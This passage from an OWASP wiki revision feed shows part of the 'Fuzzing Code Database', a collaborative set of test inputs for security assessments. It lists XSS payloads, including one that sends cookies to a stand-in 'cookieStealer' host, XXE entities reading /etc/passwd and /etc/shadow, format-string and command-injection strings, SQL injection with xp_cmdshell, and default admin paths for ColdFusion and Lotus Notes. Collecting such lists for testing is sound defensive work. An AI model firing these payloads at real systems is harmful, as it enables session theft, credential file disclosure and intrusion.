&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80021</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80021"/>
				<updated>2010-03-17T01:49:50Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 31 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
